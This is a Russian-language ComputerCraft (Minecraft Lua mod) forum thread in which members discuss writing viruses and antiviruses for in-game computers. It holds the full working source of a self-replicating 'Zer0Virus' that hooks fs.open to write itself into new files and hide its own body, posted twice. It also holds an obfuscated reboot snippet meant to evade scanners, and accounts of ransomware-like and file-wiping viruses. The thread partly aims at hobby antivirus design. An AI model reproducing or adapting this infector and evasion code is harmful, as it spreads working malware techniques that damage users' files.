Перейти к публикации
Форум - ComputerCraft
NEO

Вирусы-Антивирусы

Рекомендованные сообщения

я предлагаю написать антивирус , который будет сканировать содержимое дисков или внешних источников данных. работать,он будет как parser для него будет создан файл в котором будут написаны структуры кода,которые наносят вред компьютеру,parser будет подставлять эти структуры и определять есть ли этот файл вирус или нет,если да то он будет удалять его с диска , а если он попал на компьютер ,то и на компьютере. файл со структурами кода можно будет обновлять и не надо будет постоянно переписывать parser.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Для начала давайте напишем вирус

:)
  • Like 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

:)

В принципе все оч. просто, только подскажи строчку по которой компьютер должен перезагрузиться/включиться (пользуюсь CC)

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

os.reboot() перезагрузка , os.shutdown() выключение.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
Гость Operarus

Я думаю ваш парсер не сможет определять такой код:

local temp = "o"
temp = os["re".."b"..temp..temp.."ot"]
temp()
Для тех кто не понял он перезагружает компьютер.

А ведь написать такой криптор много легче.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

А почему вы решили, что любая программа, которая делает reboot или shutdown непременно вирус?

А почему вирус непременно должен выполнять reboot или shutdown?

Думаю, что парсер если и должен искать вирус, то какой то конкретный с известным кодом вирус, а не гипотетический вредоносный код. Вот почему я и предложил: для начала давайте напишем вирус. Между прочим, совершенно серьезно.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Я думаю ваш парсер не сможет определять такой код:

local temp = "o"
temp = os["re".."b"..temp..temp.."ot"]
temp()
Для тех кто не понял он перезагружает компьютер.

А ведь написать такой криптор много легче.

всё можно найти.Вот с помощью флагов нее и string.gmatch(), можно находить и не такие коды.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

этот парсер,очень примитивен,но не требует много ресурсов компьютера,можно сделать парсер ,который будет lua-шный код обрабатывать,разбивать на лексемы,строить логические деревья,и находить среди них вредоносный код.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
Гость Operarus

Я только не пойму как антивирус будет отличать вирус от не вируса, ведь если вы выложите этот антивирус в сеть, то любой сможет тестировать свой вирус на нём и когда он этим вирусом заразит все компьютеры будет уже поздно пополнять базы сигнатур.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Не знаю, кто как, но я не преследую цель заразить чей то компьютер или очистить от вируса. Для меня написание вируса и антивируса к нему это просто интересная задачка по программированию. Поэтому, давай отбросим практический интерес и придумаем код, который мог бы самораспространяться (вирус), и лекарство для него.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Ну как учтиво заметили в группе ВК, реднет сети слабовато распространены, чтобы вирус мог свободно гулять по компам, а так ведь с использованием КрафтНета можно спокойно летать по всей зоне покрытия и выгружать инфу с компов на пастбин, заливать на компы вредоносный софт, это-то вроде как не очень уж и сложно. Вся проблема в автоматизации процесса распростронения.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Я только не пойму как антивирус будет отличать вирус от не вируса, ведь если вы выложите этот антивирус в сеть, то любой сможет тестировать свой вирус на нём и когда он этим вирусом заразит все компьютеры будет уже поздно пополнять базы сигнатур.

тогда извиняй ,тебе не понять.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Кто хотел СС-вирус? Получите!


Внимание! Запуск нижеприведенного кода приведет к заражению компьютера!
Автор не несет ответственности за потерю информации в результате действия вируса!

 

-- Zer0Virus
local body=[[
local nativeopen=fs.open
local VirBody=...
fs.open=function(path, mode)
  local file=nativeopen(path, mode)
  if file then
    if mode=='r' then
      if file.readLine()=='-- Zer0Virus' then for i=1,19 do file.readLine() end
      else file=nativeopen(path, mode) end
    elseif mode=='w' then
      file.writeLine('-- Zer0Virus')
      file.writeLine('local body='..string.char(91,91))
      file.write(VirBody)
      file.writeLine(string.char(93,93).." loadstring(body,'Zer0Virus')(body)")
      file.flush()
    end
  end
  return file
end]] loadstring(body,'Zer0Virus')(body)
print('This program is infected!')

 




Что делает вирус?
1) При первом запуске зараженной программы остается в ОЗУ компьютера т.е. заражает его.
2) После заражения компьютера прописывает собственный код во все вновь создаваемые и редактируемые файлы.
3) Скрывает свое тело. Т.е. при открытии зараженного файла на зараженном компьютере вы увидите содержимое не зараженного файла.

Чего вирус не делает?
1) Автоматически не заражает файл startup. Т.е если startup не заражен, после перезагрузки компьютер остается чистым.
2) Не заражает копируемые и перемещаемые файлы.

Для проверки работы вируса сохраните код под спойлером в файл с именем virus. Запустите его. Откройте файл virus на редактирование. Если Вы увидели только строчку

print('This program is infected!')

поздравляю, Ваш компьютер заражен.
Создайте или отредактируйте в редакторе edit какой нибудь другой файл. Только не startup !!!
Перегрузите компьютер и вновь откройте созданный файл. Вы должны увидеть в нем код вируса.

Изменено пользователем Zer0Galaxy
  • Like 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Кто хотел СС-вирус? Получите!

 

 

Внимание! Запуск нижеприведенного кода приведет к заражению компьютера!

Автор не несет ответственности за потерю информации в результате действия вируса!

 

 

-- Zer0Virus
local body=[[
local nativeopen=fs.open
local VirBody=...
fs.open=function(path, mode)
  local file=nativeopen(path, mode)
  if file then
    if mode=='r' then
      if file.readLine()=='-- Zer0Virus' then for i=1,19 do file.readLine() end
      else file=nativeopen(path, mode) end
    elseif mode=='w' then
      file.writeLine('-- Zer0Virus')
      file.writeLine('local body='..string.char(91,91))
      file.write(VirBody)
      file.writeLine(string.char(93,93).." loadstring(body,'Zer0Virus')(body)")
      file.flush()
    end
  end
  return file
end]] loadstring(body,'Zer0Virus')(body)
print('This program are infected!') 

 

 

 

 

 

Что делает вирус?

1) При первом запуске зараженной программы остается в ОЗУ компьютера т.е. заражает его.

2) После заражения компьютера прописывает собственный код во все вновь создаваемые и редактируемые файлы. 

3) Скрывает свое тело. Т.е. при открытии зараженного файла на зараженном компьютере вы увидите содержимое не зараженного файла.

 

Чего вирус не делает?

1) Автоматически не заражает файл startup. Т.е если startup не заражен, после перезагрузки компьютер остается чистым.

2) Не заражает копируемые и перемещаемые файлы.

 

Для проверки работы вируса сохраните код под спойлером в файл с именем virus. Запустите его. Откройте файл virus на редактирование. Если Вы увидели только строчку

print('This program are infected!')

поздравляю, Ваш компьютер заражен.

Создайте или отредактируйте в редакторе edit какой нибудь другой файл. Только не startup !!!

Перегрузите компьютер и вновь откройте созданный файл. Вы должны увидеть в нем код вируса.

Видел в одном компе такой вирус, наверно у кого то такое мышление как и у тебя), нуу... Или всё же это ты

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
Кто хотел СС-вирус? Получите!

Если я правильно понял, то до ручного запуска программы будет виден истинный код, а значит шанс того, что вирус будет активирован крайне мал, что печально, ну а в целом прикольная реализация)

Можно было бы в принципе еще и со стартапом покурить, чтобы при перезагрузке вирус сам скачивался и после рестарта запускался... Хм, интересно в общем, очень интересно)

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Я нарочно не делал вирус слишком уж эффективным. Кто то хотел писать антивирус? Можно попробовать написать антивир для этого вируса. 

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
я предлагаю написать антивирус , который будет сканировать содержимое дисков или внешних источников данных. работать,он будет как parser для него будет создан файл в котором будут написаны структуры кода,которые наносят вред компьютеру,parser будет подставлять эти структуры и определять есть ли этот файл вирус или нет,если да то он будет удалять его с диска , а если он попал на компьютер ,то и на компьютере. файл со структурами кода можно будет обновлять и не надо будет постоянно переписывать parser.

Если при вставке дискеты запускается файлик startup то никакой антивирус не поможет

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Для чего нужен вирус в minecraft?
1.Если для того чтобы удалить всё с компа, то проще подойти к нему и удалить всё ручками, чем писать какую-то прогу.
Вы скажете: "Интересно бы сделать автоматическое заражение", а смысл? всё равно связаны между собой компов 1-2 и те у одного хозяина.
2. Если для того чтобы просто испортить комп, то такой вирус снести дело 5-ти минут.
Как бы вы не старались написать убер-крутой вирус всё равно в приоритете будет дискета. А исходники CC os не изменить.(((
3. Если для того чтобы украсть данные с компа, то ... А что воровать, исходник с: "printf("Hello world");" ?
Секретными разработками никто не занимается(((( 

 

Напишите свои предпосылки написания вируса?

 

p.s. Это моё мнение и оно может отличаться от вашего =)

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
Если при вставке дискеты запускается файлик startup то никакой антивирус не поможет

Поможет, нужно знать как с ним работать.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

 

Напишите свои предпосылки написания вируса?

Написание вируса, как и антивируса для него применительно к Майнкрафту, это не более чем интересная задача по программированию. А для чего иначе мы здесь собрались?

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Напишите свои предпосылки написания вируса?

Ну я писал три вируса , один из которых лечить бессмысленно (он все удаляет) , второй все зашифровывал алгоритмом фейстеля ,а третий спамил в комп бесконечное количество файлов и не довал вставить дискету и всегда ее выплевывал(они все естественно не довали сделать "CTRL+t

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Ну я писал три вируса , один из которых лечить бессмысленно (он все удаляет) , второй все зашифровывал алгоритмом фейстеля ,а третий спамил в комп бесконечное количество файлов и не довал вставить дискету и всегда ее выплевывал(они все естественно не довали сделать "CTRL+t

 

Эти три вируса бессмысленны, так как если программа серьёзная, то всегда есть копия на дискете, иначе комп в утиль и новый скрафтить.

Благо крафт лёгкий =)

 

Я придумал только один адекватный вирус, но если узнать исходник, то он контрится за пару сек. =(

Есть ещё одна идея, но для её реализации мне нужен SEMORO, а точнее исходник одной его прожки.

 

 

p.s. Это моё мнение и оно может отличаться от вашего =)

надо юзербаб запилить =)

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Написание вируса, как и антивируса для него применительно к Майнкрафту, это не более чем интересная задача по программированию. А для чего иначе мы здесь собрались?

   Мне один из преподавателей сказал: "Нужно ли искать ответ задачи, если она не применима на практике? Мы же не математики. :rolleyes: "

 

   Можно подождать пока появится Ethernet или AlexCC закончит писать банк, а потом уже начинать ломать какие-либо системы. 

Изменено пользователем Seryoga

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Я тут тоже заинтересовался и написал свой вирус. При запуске он как бы пишет "Hello world" но на самом деле он случайным образом шифрует все файлы в папке в которой находится вирус. Также вирус делает собственный стартап и прописывает туда свой код, да так что посмотреть его код или удалить его нельзя.

Выкладывать?

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Вообще хорошо бы сделать и активный антивирус и базу данных. Например, антивирус имеет огромный набор защитных комплексов, но также имеет базу данных, которую пользователь должен иногда обновлять. В базе хранятся коды разных вирусов пока не добавят систему защиты от данного типа вирусов. Да, база будет весить невероятное количество памяти, но оно того стоит.

А вообще хорошо было бы добавить такую магию как дополнительные функции: пользователь может (от проще до сложнее) сканировать файл, открывать защищённый реднет порт (сканирование файла во время приёма), открывать дополнительную оболочку (возможно с другой ос) создавая например где-то подпапку с своей системой (такой себе виртуалбокс, то есть можно запускать программы из-под другой, эмулированной системы, что бы если что то слетела она а не комп, а также сделать чтобы при окончаниисессии или перезагрузке компа папка удалялась), сканирование компов через реднет (а это уже фантастика)

Изменено пользователем GodusX

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас

×